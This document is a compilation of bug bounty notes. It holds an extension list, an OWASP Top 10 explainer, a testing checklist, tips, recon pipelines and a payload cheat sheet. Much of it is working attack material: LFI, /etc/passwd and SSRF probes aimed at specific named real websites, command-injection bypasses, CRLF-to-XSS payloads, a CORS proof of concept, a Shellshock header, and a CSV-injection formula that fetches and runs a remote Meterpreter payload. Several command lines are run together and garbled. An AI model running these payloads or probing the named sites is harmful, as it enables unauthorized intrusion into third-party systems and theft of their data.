🌟 Useful Extensions for Bug Bounty Hunting 🌟
🌟 Useful Extensions for Bug Bounty Hunting 🌟
As bug bounty hunters, having the right tools at our disposal can make all the difference in our reconnaissance and testing efforts. Here’s a curated list of must-have Firefox extensions to enhance your workflow:
Waybackurl - Historical URLs fetcher [https://addons.mozilla.org/en-US/firefox/addon/shodan-addon/]
Vulners Web Scanner - Vulnerability database [https://addons.mozilla.org/en-US/firefox/addon/vulners-web-scanner/
Vt4Browsers - VirusTotal extension [https://addons.mozilla.org/en-US/firefox/addon/vt4browsers/]
Wayback Machine - Web archive tool [https://addons.mozilla.org/en-US/firefox/addon/wayback-machine_new/]
Shodan - Internet-connected devices scanner [https://addons.mozilla.org/en-US/firefox/addon/shodan-addon/]
TempMail - Disposable email provider [https://addons.mozilla.org/en-US/firefox/addon/temp-mail/]
Retire.js - JavaScript dependency scanner [https://addons.mozilla.org/en-US/firefox/addon/retire-js/
Privacy Badger - Tracker blocker [https://addons.mozilla.org/en-US/firefox/addon/privacy-badger17/]
OWASP Penetration Testing Kit - Security testing tools[https://addons.mozilla.org/en-US/firefox/addon/penetration-testing-kit/]
Max HackBar - Pentesting toolbar [https://addons.mozilla.org/en-US/firefox/addon/maxs-hackbar/]
Link Gopher - URL extractor [https://addons.mozilla.org/en-US/firefox/addon/link-gopher/]
Hunter - Email discovery tool [https://addons.mozilla.org/en-US/firefox/addon/hunterio/]
Hack-Tools - Pentesting resources [https://addons.mozilla.org/en-US/firefox/addon/hacktools/]
FoxyProxy - Proxy switcher [https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/]
Firefox Multi-Account Containers - Tab isolation [https://addons.mozilla.org/en-US/firefox/addon/multi-account-containers/
Dark Reader - Dark mode extension [https://addons.mozilla.org/en-US/firefox/addon/darkreader/]
Cookie-Editor - Cookie management [https://addons.mozilla.org/en-US/firefox/addon/cookie-editor/]
Bulk URL Opener - Mass URL opener [https://addons.mozilla.org/en-US/firefox/addon/bulk-url-opener/]
Wappalyzer - Technology profiler [https://addons.mozilla.org/en-US/firefox/addon/wappalyzer/]
WhatRuns - Tech stack identifier [https://addons.mozilla.org/en-US/firefox/addon/whatruns/]
🚀 Why Use These Extensions? These tools are essential for gathering intelligence, identifying vulnerabilities, and efficiently managing your bug bounty tasks. Whether you're fetching historical URLs, scanning for vulnerabilities, or managing your cookies, these extensions can streamline your workflow and improve your chances of success.
💡 Let’s elevate our bug hunting skills together! Feel free to share your favorite tools and any tips you have for effective bug bounty hunting. Happy hunting! 🔍💻
#BugBounty #Cybersecurity #Pentesting #Recon #Tools #FirefoxExtensions
[ ]
OWASP Top 10 Vulnerabilities for 2024: In-Depth Explanation
The OWASP (Open Web Application Security Project) Top 10 is a standard awareness document for developers and web application security. It represents a broad consensus about the most critical security risks to web applications. Understanding these vulnerabilities is essential for anyone involved in cybersecurity, especially for students like you, Salik, who are delving into bug bounty and penetration testing.
Let’s go through each of the OWASP Top 10 vulnerabilities for 2024, providing detailed explanations, examples, and guidance on how to mitigate these risks.
Visit OWASP Official Site Visit OWASP
1. Broken Access Control
Description: Access control is crucial in preventing unauthorized users from accessing sensitive information or performing actions they shouldn’t be able to. Broken access control occurs when these permissions are not correctly enforced. This can lead to unauthorized access, data leakage, and even complete system compromise.
Example: Imagine a web application that allows users to view their own invoices. If the application does not properly enforce access control, a malicious user might be able to manipulate the URL to access someone else’s invoice simply by changing an ID in the URL.
http://example.com/invoice/view/123By changing 123 to 124, the attacker might access someone else’s invoice if access control is broken.
Mitigation:
Implement role-based access control (RBAC).
Use secure coding practices to enforce access permissions.
Regularly test and review access controls.
2. Cryptographic Failures
Description: This refers to weaknesses in the encryption process that protect data in transit or at rest. It includes weak algorithms, improper key management, and the failure to use encryption where necessary.
Example: An application that transmits sensitive information like passwords over HTTP instead of HTTPS is vulnerable to man-in-the-middle attacks. An attacker could intercept the traffic and steal the information.
Mitigation:
Always use strong encryption algorithms (e.g., AES-256).
Ensure proper key management and secure key storage.
Use HTTPS for all sensitive data transmissions.
3. Injection
Description: Injection flaws, such as SQL, NoSQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.
Example: In a login form, if the application doesn’t properly sanitize inputs, an attacker could enter:
' OR '1'='1This could result in bypassing authentication.
Mitigation:
Use prepared statements with parameterized queries.
Sanitize and validate all user inputs.
Use ORM libraries that automatically handle input sanitization.
4. Insecure Design
Description: Insecure design refers to flaws in the application's design that create security vulnerabilities. This includes the absence of necessary security controls or the use of insecure patterns in the architecture.
Example:
An application that doesn’t enforce password complexity requirements might allow users to create weak passwords like 12345, which are easily guessable.
Mitigation:
Follow secure design principles from the beginning.
Perform threat modeling and risk assessment.
Regularly update and review design patterns.P
5. Security Misconfiguration
Description: Security misconfiguration is one of the most common vulnerabilities and occurs when security settings are incorrectly configured or left at insecure defaults. This can include unpatched systems, misconfigured cloud storage, and verbose error messages that reveal too much information.
Example: An application that displays detailed error messages (e.g., stack traces) to users could give an attacker clues about the underlying technology stack, making it easier to exploit vulnerabilities.
Mitigation:
Implement a secure configuration management process.
Disable or restrict access to unnecessary features.
Regularly audit and update configurations.
6. Vulnerable and Outdated Components
Description: Using components with known vulnerabilities (e.g., libraries, frameworks, or other software modules) is a common risk. If an application includes these vulnerable components, attackers can exploit them to compromise the system.
Example: A web application that uses an outdated version of a popular JavaScript library could be susceptible to known exploits that have been patched in later versions.
Mitigation:
Regularly update all components and dependencies.
Use tools like Dependabot to automate dependency updates.
Subscribe to security mailing lists to stay informed about vulnerabilities.
7. Identification and Authentication Failures
Description: This category involves flaws in authentication and session management. These failures could allow attackers to impersonate other users, compromising their accounts.
Example: If an application doesn’t enforce multi-factor authentication (MFA) and relies solely on passwords, an attacker who successfully guesses or cracks a user’s password can gain full access to their account.
Mitigation:
Implement MFA wherever possible.
Use strong, unique passwords for each account.
Securely store authentication tokens and avoid exposing them in URLs.
8. Software and Data Integrity Failures
Description: This vulnerability occurs when software updates, critical data, or CI/CD pipelines are compromised. Attackers can inject malicious code, leading to unauthorized actions or data corruption.
Example: If an attacker gains access to a CI/CD pipeline and injects malicious code into a software update, every user who installs the update could be compromised.
Mitigation:
Use digital signatures to verify the integrity of software updates.
Secure CI/CD pipelines with proper access controls and monitoring.
Regularly audit code and configurations.
9. Security Logging and Monitoring Failures
Description: Without adequate logging and monitoring, security incidents can go undetected, allowing attackers to maintain persistent access to systems. This category also includes insufficient alerting or response to detected anomalies.
Example: An application that doesn’t log failed login attempts may fail to notice a brute-force attack in progress, allowing the attacker to eventually gain access.
Mitigation:
Implement comprehensive logging and monitoring strategies.
Regularly review logs for suspicious activity.
Set up alerts for critical security events.
10. Server-Side Request Forgery (SSRF)
Description: SSRF vulnerabilities occur when an application fetches a remote resource without validating the user-supplied URL. Attackers can exploit this to access internal services, bypassing firewalls and other protections.
Example: If a web application allows users to specify a URL to fetch data from and doesn’t validate the input, an attacker might input a URL pointing to an internal service:
http://localhost/adminThis could allow the attacker to access internal administrative functions.
Mitigation:
Validate and sanitize all user-supplied URLs.
Restrict the range of acceptable IP addresses and protocols.
Use network segmentation to isolate sensitive internal services.
Conclusion
The OWASP Top 10 vulnerabilities for 2024 highlight the most critical security risks that developers and security professionals need to be aware of. By understanding these vulnerabilities, their examples, and mitigation strategies, you can significantly enhance the security posture of the applications you work on.
Visual Representation (For Better Understanding)
Here’s a simple visual design using Markdown to reinforce these concepts:
+---------------------------------------------+
| OWASP TOP 10 (2024) |
+---------------------------------------------+
| 1. Broken Access Control |
| 2. Cryptographic Failures |
| 3. Injection |
| 4. Insecure Design |
| 5. Security Misconfiguration |
| 6. Vulnerable and Outdated Components |
| 7. Identification and Authentication Failures|
| 8. Software and Data Integrity Failures |
| 9. Security Logging and Monitoring Failures |
| 10. Server-Side Request Forgery (SSRF) |
+---------------------------------------------+By staying updated with these vulnerabilities and incorporating security best practices in your development and testing processes, you can contribute to creating more secure applications and systems. Happy learning, and may your journey in cybersecurity be both rewarding and impactful!
OWASP TOP 10 CL[]
The Checklist
[+] Information Gathering
Manually explore the site Spider/crawl for missed or hidden content Check for files that expose content, such as robots.txt, sitemap.xml, .DS_Store Check the caches of major search engines for publicly accessible sites Check for differences in content based on User Agent (eg, Mobile sites, access as a Search engine Crawler) Perform Web Application Fingerprinting Identify technologies used Identify user roles Identify application entry points Identify client-side code Identify multiple versions/channels (e.g. web, mobile web, mobile app, web services) Identify co-hosted and related applications Identify all hostnames and ports Identify third-party hosted content
[+] Configuration Management
Check for commonly used application and administrative URLs Check for old, backup and unreferenced files Check HTTP methods supported and Cross Site Tracing (XST) Test file extensions handling Test for security HTTP headers (e.g. CSP, X-Frame-Options, HSTS) Test for policies (e.g. Flash, Silverlight, robots) Test for non-production data in live environment, and vice-versa Check for sensitive data in client-side code (e.g. API keys, credentials)
[+] Secure Transmission
Check SSL Version, Algorithms, Key length Check for Digital Certificate Validity (Duration, Signature and CN) Check credentials only delivered over HTTPS Check that the login form is delivered over HTTPS Check session tokens only delivered over HTTPS Check if HTTP Strict Transport Security (HSTS) in use
[+] Authentication
Test for user enumeration Test for authentication bypass Test for bruteforce protection Test password quality rules Test remember me functionality Test for autocomplete on password forms/input Test password reset and/or recovery Test password change process Test CAPTCHA Test multi factor authentication Test for logout functionality presence Test for cache management on HTTP (eg Pragma, Expires, Max-age) Test for default logins Test for user-accessible authentication history Test for out-of channel notification of account lockouts and successful password changes Test for consistent authentication across applications with shared authentication schema / SSO
[+] Session Management
Establish how session management is handled in the application (eg, tokens in cookies, token in URL) Check session tokens for cookie flags (httpOnly and secure) Check session cookie scope (path and domain) Check session cookie duration (expires and max-age) Check session termination after a maximum lifetime Check session termination after relative timeout Check session termination after logout Test to see if users can have multiple simultaneous sessions Test session cookies for randomness Confirm that new session tokens are issued on login, role change and logout Test for consistent session management across applications with shared session management Test for session puzzling Test for CSRF and clickjacking
[+] Authorization
Test for path traversal Test for bypassing authorization schema Test for vertical Access control problems (a.k.a. Privilege Escalation) Test for horizontal Access control problems (between two users at the same privilege level) Test for missing authorization
[+] Data Validation
Test for Reflected Cross Site Scripting Test for Stored Cross Site Scripting Test for DOM based Cross Site Scripting Test for Cross Site Flashing Test for HTML Injection Test for SQL Injection Test for LDAP Injection Test for ORM Injection Test for XML Injection Test for XXE Injection Test for SSI Injection Test for XPath Injection Test for XQuery Injection Test for IMAP/SMTP Injection Test for Code Injection Test for Expression Language Injection Test for Command Injection Test for Overflow (Stack, Heap and Integer) Test for Format String Test for incubated vulnerabilities Test for HTTP Splitting/Smuggling Test for HTTP Verb Tampering Test for Open Redirection Test for Local File Inclusion Test for Remote File Inclusion Compare client-side and server-side validation rules Test for NoSQL injection Test for HTTP parameter pollution Test for auto-binding Test for Mass Assignment Test for NULL/Invalid Session Cookie
[+] Denial of Service
Test for anti-automation Test for account lockout Test for HTTP protocol DoS Test for SQL wildcard DoS
[+] Business Logic
Test for feature misuse Test for lack of non-repudiation Test for trust relationships Test for integrity of data Test segregation of duties
[+] Cryptography
Check if data which should be encrypted is not Check for wrong algorithms usage depending on context Check for weak algorithms usage Check for proper use of salting Check for randomness functions
[+] Risky Functionality - File Uploads
Test that acceptable file types are whitelisted Test that file size limits, upload frequency and total file counts are defined and are enforced Test that file contents match the defined file type Test that all file uploads have Anti-Virus scanning in-place. Test that unsafe filenames are sanitised Test that uploaded files are not directly accessible within the web root Test that uploaded files are not served on the same hostname/port Test that files and other media are integrated with the authentication and authorisation schemas
[+] Risky Functionality - Card Payment
Test for known vulnerabilities and configuration issues on Web Server and Web Application Test for default or guessable password Test for non-production data in live environment, and vice-versa Test for Injection vulnerabilities Test for Buffer Overflows Test for Insecure Cryptographic Storage Test for Insufficient Transport Layer Protection Test for Improper Error Handling Test for all vulnerabilities with a CVSS v2 score > 4.0 Test for Authentication and Authorization issues Test for CSRF
[+] HTML 5
Test Web Messaging Test for Web Storage SQL injection Check CORS implementation Check Offline Web Application
[[#Bug Bounty Tips|Bug Bounty Tips]]
Bug Bounty Tips
Tip #1
Use GIT as a recon tool. Find the target's GIT repositories, clone them, and then check the logs for information on the team not necessarily in the source code. Say the target is Reddit and I want to see which developers work on certain projects.
Tip #2
Look for GitLab instances on targets or belonging to the target. When you stumble across the GitLab login panel, navigate to /explore. Misconfigured instances do not require authentication to view the internal projects. Once you get in, use the search function to find passwords, keys, etc. This is a pretty big attack vector and I am finally revealing it today, because I am sure it will help a lot of you get some critical issues.
Tip #3
Bug bounty tip: test applications of a company that costs money or requires manual setup. Chances are only few to none would have tested it leaving it vulnerable.
Tip #4
If you’ve found an IDOR where you’re able to change data of others then don’t jump out of your seat to report it > modify it to XSS payload & if inputs are not sanitized & variables are echo’d without getting escaped then IDOR>XSS>ATO.
Tip #5
Look for hackathon-related assets. What I mean by this is sometimes companies run hackathons and give attendees special access to certain API endpoints and/or temporary credentials. I have found GIT instances that were set up for Hackathons full of information that allowed me to find more issues in the target several times.
Tip #6
Keep all your directory brute force results so when a CVE like Drupalgeddon2 comes out, you can look for previously found instances (cat dirsearch/reports// | grep INSTALL.mysql.txt | grep 200 | less)/
Tip #7
When you have a form, always try to change the request method from POST to GET in order to improve the CVSS score. For example, demonstrating a CSRF can be exploited simply by using [img] tag is better than having to send a link to the victim.
Bug Bounty Tip:
If you got ‘Subdomain Takeover’ don’t report it yet, look at the main site/app for gain privileges: like a potential CSP policy bypass (or session hijacking via Set-cookie: *.domain.com
Bug Bounty Tip:
if server only allows GET and POST method, then try adding “X-HTTP-Method -Override: PUT to achieve RCE via PUT method
BugBounty tip If you found that registration page without verification 1- try to create account with admin@<company.com> 2- open the account 3- found that high privilege then usual hashtag#bugbounty hashtag#bugbountytips hashtag#redteaming hashtag#rednexus hashtag#hackerone
BUG BOUNTY RECON PROCESS
subfinder -d <Target> -all -recursive > subdomain.txtassetfinder --> assestfinder.txtsort -u subdomain.txt assestfinder.txt > total_subdomains.txtsudo subzy run -targets total_subdomains.txthttpx -l urls.txt -o livehosts.txtcat subdomain.txt|httpx-toolkit -ports 80,443,8080, 8000, 8888 -threads 200 >
subdomains_alive.txtcat subdomain.txt|httpx-toolkit -ports 80,443,8080, 8000, 8888 -mc 200,403,400,500 -o live.txtcat live.txt | httpx -status-codekatana -u subdomains_alive.txt -d 5 -ps -pss waybackarchive,commoncrawl,alienvault -kf -jc -fx -ef woff,css,png,svg,jpg,woff2,jpeg,gif,svg -o allurls.txtcat allurls.txt | grep -E "\.txt|\.log|\.cache|\.secret|\.db|\.backup|\.yml|\.json|\.gz|\.rar|\.zip|\.config"cat allurls.txt | grep -E "\.js$" > js.txtcat alljs.txt | nuclei -t /home/rohit/recon/nuclei-templates-9.9.3 /http/exposures/dirsearch -u <URL> -e conf,config, bak, backup, swp, old, db, sql,asp,aspx,aspx-,asp-, py,py-, rb, rb, php, php-, bak, bkp, cache, cgi, conf, csv, html, inc, jar, js, json, jsp, jsp-, lock, log, rar, old, sql, sql.gz,http:// sql.zip,sql.tar.gz, sql-, swp, swp-, tar, tar.bz2, tar.gz, txt,wadl, zip,.log,.xml,.js.,.jsonpython3 Corsy -i subdomains_alive.txt -t 100cat lfi.txt | nuclei -t <lfi cve> -dastcat allurls.txt | gf redirect | openredirex -p <Payloads>nmap -iL subdomains.txt -T4 -oN nmap_scan.txtsqlmap -m parameters.txt --batch --level=5 --risk=3 --dbscat lfi_candidates.txt | xargs -I {} sh -c 'ffuf -u "{}?file=FUZZ" -w /home/rohit/recon/payloads/LFI\ payloads.txt -v -mr "root:x:0:0:" -o lfi_results_$(echo {} | sed "s/[^a-zA-Z0-9]/_/g").txt'echo url | gau | urldedupe -qs | gf sqlicat endpoints.txt | gau | urldedupe -qs | gf redirect > redirect.txt
nuclei -l filename -tags xssCommand Injection Recon
COMMAND INJECTION RECON PROCESS1. Subdomain Enumeration
--->
subfinder -d target.com | tee subdomains.txt2. URL and Path Discovery
--->
gau target.com | tee urls.txt3. Filter for Command Injection Vulnerable Endpoints using gf
--->
cat urls.txt | gf command-injection | tee cmd_injection_candidates.txt4. Scan Command Injection Candidates with Commix
--->
cat cmd_injection_candidates.txt | xargs -I{} commix --url={} --batch (OR)--->
nuclei -t cves/2021/command-injection.yaml -u https://target.com5. Fuzz Parameters for Command Injection Vulnerabilities
--->
ffuf -u https://target.com/FUZZ -w /path/to/wordlist.txt -H "User-Agent: $(id)" -o ffuf-results.jsonADDTIONAL METHODS TO BYPASS
#1. Header-based Injection --->
curl -H "User-Agent: $(whoami)" https://target.com#2. DNS Blind Command Injection Detection
---> ;
nslookup yourdnsserver.com && ping -c 1 yourdnsserver.com#3 . Time-based Blind Injection
--->
; sleep 10
&& ping -c 5 localhost#4 . URL Encoding:
--->
%26%26whoami#5. Whitespace Manipulation
--->
; ping${IFS}-c${IFS}4${IFS}localhostlfi recon
subfinder -d ravagedband.com | httpx-toolkit | gau | uro | gf lfi | tee ravagedband.txt
nuclei -list ravagedband.txt -tags lfi
echo 'https://arc.iram.fr/' | gau | uro | gf lfi
nuclei -target 'https://arc.iram.fr/home.php?page=about.php' -tags lfi
http://lars-seeberg.com
nuclei -target 'http://lars-seeberg.com ' -tags lfi
https://mylocal.life/index.php?page=contact.php
nuclei -target 'https://mylocal.life/index.php?page=contact.php' -tags lfi
dotdotpwn -m http-url -d 10 -f /etc/passwd -u "https://mylocal.life/index.php/pandora_console/ajax.php?page=TRAVERSAL" -b -k "root:"
subfinder -d mylocal.life | httpx-toolkit | gau | uro | gf lfi | qsreplace "/etc/passwd" | while read url ; do curl -silent "$url" | grep "root:x" && echo "$url is vulnerable" ; done;
echo 'http://santosranch.com/?page=contact.php' | qsreplace "/etc/passwd" | while read url ; do curl -silent "$url" | grep "root:x" && echo "$url is vulnerable" ; done;
nuclei -target 'http://santosranch.com/?page=contact.php' -tags lfi
echo "https://sksc.somaiya.edu" | waybackurls | gf redirect
https://sksc.somaiya.edu/download.php?pdf_path=https%3A%2F%2Fdharma-studies.s3.ap-south-1.amazonaws.com%2FCSJ-Syllabi%2F28_CSJ_M.A.%2BJainology%2Band%2BPrakrit_July%2BAC_260820.pdf
https://sksc.somaiya.edu/download.php?pdf_path=file:///etc/passwd
SSRF bypass By DNS rebinding
USING FOLLOWING LINK
http://lock.cmpxchg8b.com/rebinder.html
https://sksc.somaiya.edu/download.php?pdf_path=http://7f000001.a3468a23.rbndr.us
Vuln wordpresss site
https://thefutureafrica.com/
## Content Injection
❤ bounty plsCross Origin Resource Sharing (CORS)
Testing: curl --head -s 'http://example.com/api/v1/secret' -H 'Origin: http://evil.com'
Check to see what the server responds with in the Access-Control-Allow-Origin: (if anything) and if so, check if Access-Control-Allow-Credentials: true is present.
If it is trusting arbitrary origins with allow-credentials set to true, then host this HTML as a proof of concept.
<!DOCTYPE html>
<html>
<head><title>BugBounty CheatSheet</title></head>
<body>
<center>
<h2>CORs POC</h2>
<textarea rows="10" cols="60" id="pwnz">
</textarea><br>
<button type="button" onclick="cors()">Exploit</button>
</div>
<script>
function cors() {
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
if (this.readyState == 4 && this.status == 200) {
document.getElementById("pwnz").innerHTML = this.responseText;
}
};
xhttp.open("GET", "http://example.com/api/v1/topsecret", true);
xhttp.withCredentials = true;
xhttp.send();
}
</script>CRLF Injection || HTTP Response Splitting
%0dSet-Cookie:csrf_token=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;Header-based test, site root
%0d%0aheader:header%0aheader:header%0dheader:header%23%0dheader:header%3f%0dheader:header/%250aheader:header/%25250aheader:header/%%0a0aheader:header/%3f%0dheader:header/%23%0dheader:header/%25%30aheader:header/%25%30%61header:header/%u000aheader:headerCRLF chained with Open Redirect server misconfiguration
Note: This sometimes works. (Discovered in some Yandex sites, was not exploitable from the root.)
//www.google.com/%2f%2e%2e%0d%0aheader:header/www.google.com/%2e%2e%2f%0d%0aheader:header/google.com/%2F..%0d%0aheader:headerTwitter specific CRLF by @filedescriptor
%E5%98%8A%E5%98%8Dheader:headerCRLF Injection to XSS
%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2e%2eResponse splitting on 302 Redirect, before Location header (Discovered in DoD)
%0d%0aContent-Type:%20text%2fhtml%0d%0aHTTP%2f1.1%20200%20OK%0d%0aContent-Type:%20text%2fhtml%0d%0a%0d%0a%3Cscript%3Ealert('XSS');%3C%2fscript%3EResponse splitting on 301 code, chained with Open Redirect to corrupt location header and to break 301 by @black2fan (Facebook bug)
Note: xxx:1 was used for breaking open redirect destination (Location header). Great example how of to escalate CRLF to XSS on a such, it would seem, unexploitable 301 status code.
%2Fxxx:1%2F%0aX-XSS-Protection:0%0aContent-Type:text/html%0aContent-Length:39%0a%0a%3cscript%3ealert(document.cookie)%3c/script%3e%2F..%2F..%2F..%2F../trCrypto
MD5 Collision Strings
%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2URL decode strings.
SHA-1 Collision Strings
%25%50%44%46%2D%31%2E%33%0A%25%E2%E3%CF%D3%0A%0A%0A%31%20%30%20%6F%62%6A%0A%3C%3C%2F%57%69%64%74%68%20%32%20%30%20%52%2F%48%65%69%67%68%74%20%33%20%30%20%52%2F%54%79%70%65%20%34%20%30%20%52%2F%53%75%62%74%79%70%65%20%35%20%30%20%52%2F%46%69%6C%74%65%72%20%36%20%30%20%52%2F%43%6F%6C%6F%72%53%70%61%63%65%20%37%20%30%20%52%2F%4C%65%6E%67%74%68%20%38%20%30%20%52%2F%42%69%74%73%50%65%72%43%6F%6D%70%6F%6E%65%6E%74%20%38%3E%3E%0A%73%74%72%65%61%6D%0A%FF%D8%FF%FE%00%24%53%48%41%2D%31%20%69%73%20%64%65%61%64%21%21%21%21%21%85%2F%EC%09%23%39%75%9C%39%B1%A1%C6%3C%4C%97%E1%FF%FE%01%73%46%DC%91%66%B6%7E%11%8F%02%9A%B6%21%B2%56%0F%F9%CA%67%CC%A8%C7%F8%5B%A8%4C%79%03%0C%2B%3D%E2%18%F8%6D%B3%A9%09%01%D5%DF%45%C1%4F%26%FE%DF%B3%DC%38%E9%6A%C2%2F%E7%BD%72%8F%0E%45%BC%E0%46%D2%3C%57%0F%EB%14%13%98%BB%55%2E%F5%A0%A8%2B%E3%31%FE%A4%80%37%B8%B5%D7%1F%0E%33%2E%DF%93%AC%35%00%EB%4D%DC%0D%EC%C1%A8%64%79%0C%78%2C%76%21%56%60%DD%30%97%91%D0%6B%D0%AF%3F%98%CD%A4%BC%46%29%B1%25%50%44%46%2D%31%2E%33%0A%25%E2%E3%CF%D3%0A%0A%0A%31%20%30%20%6F%62%6A%0A%3C%3C%2F%57%69%64%74%68%20%32%20%30%20%52%2F%48%65%69%67%68%74%20%33%20%30%20%52%2F%54%79%70%65%20%34%20%30%20%52%2F%53%75%62%74%79%70%65%20%35%20%30%20%52%2F%46%69%6C%74%65%72%20%36%20%30%20%52%2F%43%6F%6C%6F%72%53%70%61%63%65%20%37%20%30%20%52%2F%4C%65%6E%67%74%68%20%38%20%30%20%52%2F%42%69%74%73%50%65%72%43%6F%6D%70%6F%6E%65%6E%74%20%38%3E%3E%0A%73%74%72%65%61%6D%0A%FF%D8%FF%FE%00%24%53%48%41%2D%31%20%69%73%20%64%65%61%64%21%21%21%21%21%85%2F%EC%09%23%39%75%9C%39%B1%A1%C6%3C%4C%97%E1%FF%FE%01%7F%46%DC%93%A6%B6%7E%01%3B%02%9A%AA%1D%B2%56%0B%45%CA%67%D6%88%C7%F8%4B%8C%4C%79%1F%E0%2B%3D%F6%14%F8%6D%B1%69%09%01%C5%6B%45%C1%53%0A%FE%DF%B7%60%38%E9%72%72%2F%E7%AD%72%8F%0E%49%04%E0%46%C2%30%57%0F%E9%D4%13%98%AB%E1%2E%F5%BC%94%2B%E3%35%42%A4%80%2D%98%B5%D7%0F%2A%33%2E%C3%7F%AC%35%14%E7%4D%DC%0F%2C%C1%A8%74%CD%0C%78%30%5A%21%56%64%61%30%97%89%60%6B%D0%BF%3F%98%CD%A8%04%46%29%A1URL decode strings.
Bcrypt (BSD) Wraparound Bug
$2a$ Bcrypt hashes were vulnerable to a wraparound bug where the first string in the list below would output the same hash as the next strings.
0000000000000000000000000000000000000000000000000000000000000000000000000123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012340123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345Length extension attack
In cryptography and computer security, a length extension attack is a type of attack where an attacker can use Hash(message1) and the length of message1 to calculate Hash(message1 ∥ message2) for an attacker-controlled message2.
In Summary: Given a hash that is composed of a string with an unknown prefix, an attacker can append to the string and produce a new hash that still has the unknown prefix.
An example:
http://example.com/download?file=report.pdf&mac=563162c9c71a17367d44c165b84b85ab59d036f9http://example.com/download?file=report.pdf%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00
%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00
%00%00%A8/../../../../../../../etc/passwd&mac=ee40aa8ec0cfafb7e2ec4de20943b673968857a5A related HackerOne report: https://hackerone.com/reports/251572
Tool to extend a hash: https://github.com/iagox86/hash_extender
More details about the attack:
https://www.whitehatsec.com/blog/hash-length-extension-attacks/ https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks
CSV Injection
Newline character
%0A-3+3+cmd|' /C calc'!D2Meterpreter Shell
=cmd|'/C powershell IEX(wget bit.ly/1X146m3)'!A0RCE
Werkzeug Debugger
Find somewhere where user input can be supplied and submit the following string to cause an error:
strіngIf the target is running their application in debug mode you might be able to run commands. If you are running the target locally, you can probably brute-force the debugger PIN. The debugger PIN is always in the following format: ***-***-***.
Basic Bypasses
i'''d
i"""d\l\s -l\a\hcat /e?c/p?ss??
cat /e??/??ss*{ls,}
{ls,-a}Shellshock Bug
() { :;}; echo vulnerablecurl -H "User-Agent: () { :; }; /bin/eject" http://example.com/Special Tools
Resolution
http://dnsbin.zhack.ca (DNS)
http://pingb.in (DNS)
https://www.mockbin.org/ (HTTP)
Wildcard DNS
10.0.0.1.xip.io
www.10.0.0.1.xip.io
mysite.10.0.0.1.xip.io
foo.bar.10.0.0.1.xip.io10.0.0.1.nip.io
app.10.0.0.1.nip.io
customer1.app.10.0.0.1.nip.io
customer2.app.10.0.0.1.nip.io
otherapp.10.0.0.1.nip.ioReconnaissance
https://spyse.com (fully-fledged recon service)
https://dnsdumpster.com (DNS and subdomain recon)
Reverse IP Lookup (Domainmonitor)
Security headers (Security Report, missing headers)
http://threatcrowd.org (WHOIS, DNS, email, and subdomain recon)
https://mxtoolbox.com (wide range of DNS-related recon tools)
https://publicwww.com/ (Source Code Search Engine)
http://ipv4info.com/ (Find domains in the IP block owned by a Company/Organization)
HackerTarget Tools (DNS recon, site lookup, and scanning tools)
VirusTotal (WHOIS, DNS, and subdomain recon)
crt.sh (SSL certificate search)
Google CT (SSL certificate transparency search)
PenTest Tools (Google dorks)
Wayback Machine (Find stuff which was hosted on the domain in past)
FindSubdomains (Find subdomains using domain or keywords)
Report Templates
Certspotter
curl https://certspotter.com/api/v0/certs\?domain\=example.com | jq '.[].dns_names[]' | sed 's/\"//g' | sed 's/\*\.//g' | uniqcurl https://certspotter.com/api/v0/certs\?domain\=example.com | jq '.[].dns_names[]' | sed 's/\"//g' | sed 's/\*\.//g' | uniq | dig +short -f - | uniq | nmap -T5 -Pn -sS -i - -p 80,443,21,22,8080,8081,8443 --open -n -oG -Sublist3r One-liner
This runs Sublist3r on a list of domains and outputs the results in separate files.
. <(cat domains | xargs -n1 -i{} python sublist3r.py -d {} -o {}.txt)apktool d app.apk; cd app;mkdir collection; find . -name \*.smali -exec sh -c "cp {} collection/\$(head /dev/urandom | md5 | cut -d' ' -f1).smali" \;; linkfinder -i 'collection/*.smali' -o cliAquatone One-liner
$ echo "aquatone-discover -d \$1 && aquatone-scan -d \$1 --ports huge && aquatone-takeover -d \$1 && aquatone-gather -d \$1" >> aqua.sh && chmod +x aqua.sh
$./aqua.sh domain.com$ ruby extract.rb demo-file.js
$ ruby extract.rb https://hackerone.com/some-file.js
$ ruby extract.rb '|cat demo-file.js' -cOpen Redirect
/%09/google.com/%5cgoogle.com//www.google.com/%2f%2e%2e//www.google.com/%2e%2e//google.com///google.com/%2f..//\google.com/\victim.com:80%40google.comPossible open redirect parameters
